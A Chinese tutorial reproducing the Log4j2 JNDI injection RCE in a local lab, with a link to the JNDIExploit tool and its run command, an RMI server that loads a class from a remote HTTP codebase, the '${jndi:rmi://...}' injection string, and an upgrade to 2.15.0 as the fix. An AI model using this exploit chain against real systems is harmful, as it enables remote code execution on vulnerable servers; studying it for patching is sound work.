@TOC
在Log4j2.x<=2.14.1版本,攻击者可通过构造恶意请求,触发远程代码执行漏洞
一款用于 JNDI注入 利用的工具
https://github.com/feihong-cs/JNDIExploit
运行
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip
tips: 自行编写相应逻辑
^_^
public class AppRun {
static {
System.out.println("hello world...");
}
}javac AppRun.java将编译好的AppRun.class放入nginx服务器根目录下
public class RmiServer {
public static void main(String[] args) {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
// 本地执行方式
// Reference reference = new Reference("AppRun", "AppRun", null);
// tips:如果是远程执行,需要将`AppRun`编译后的字节码文件放到nginx html访问目录下,再通过如下方式执行程序
Reference reference = new Reference("AppRun", "AppRun", "http://www.zhengqingya.com:80/");
registry.bind("app", new ReferenceWrapper(reference));
System.out.println("Create app registry on port 1099...");
} catch (Exception e) {
e.printStackTrace();
}
}
}运行RmiServer
模拟输出特定值,实际上可在前端页面上的输入框中输入这些值,只要程序后台通过log4j打印这些值即会触发远程代码AppRun执行相应逻辑
public class Log4j {
private static final Logger log = LogManager.getLogger(Log4j.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
log.error("test1: ${java:os}");
log.error("test2: ${jndi:rmi://192.168.101.88:1099/app}");
}
}运行Log4j,即可查看效果
升级log4j版本至2.15.0
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.15.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.15.0</version>
</dependency>https://gitee.com/zhengqingya/java-workspace
今日分享语句: 就算学习和生活再艰难,也要一边痛着,一边笑着,给生活一张漂亮的脸。